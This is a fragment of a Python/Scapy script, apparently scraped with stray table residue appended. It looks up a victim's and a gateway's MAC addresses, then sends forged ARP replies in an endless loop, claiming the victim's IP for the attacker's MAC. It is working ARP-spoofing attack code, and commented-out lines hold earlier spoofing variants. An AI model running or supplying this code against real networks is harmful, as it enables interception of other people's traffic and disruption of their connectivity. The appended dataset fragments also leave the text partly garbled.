gateway = network_parts[0]+ "."+network_parts[1]+ "."+network_parts[2]+ ".1"
broadcastNet = network_parts[0]+ "."+network_parts[1]+ "."+network_parts[2]+ ".255"
# print(str(my_ip) + " " + str(victim_ip) + " " + gateway)
arp_packet = ARP(op=ARP.who_has, psrc=my_ip, pdst=victim_ip)
result = sr1(arp_packet)
victim_mac = result[ARP].hwsrc
arp_packet = ARP(op=ARP.who_has, psrc=my_ip, pdst=gateway)
result = sr1(arp_packet)
gateway_mac = result[ARP].hwsrc
#######################################################################################################################
reply = ARP(op=ARP.is_at, hwsrc=my_mac, psrc=victim_ip, hwdst="ff:ff:ff:ff:ff:ff", pdst=broadcastNet)
go = Ether(dst="ff:ff:ff:ff:ff:ff", src=my_mac) / reply
# send(go, verbose = 2, loop = 1)
while 1:
sendp(go, verbose = 2)
# time.sleep(randint(1, 3))
#######################################################################################################################
# ip_packet = IP(ttl=64)
# ip_packet.dst = gateway
# ip_packet.src = victim_ip
# icmp_packet = ip_packet/ICMP()/"Hello World"
# send(icmp_packet, verbose = 2, loop = 1)
# while 1:
# send(ARP(op=ARP.is_at, psrc=victim_ip, hwdst="255.255.255.255", pdst="192.168.0.255"), verbose = 2)
| 23.758621 | 119 | 0.582487 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.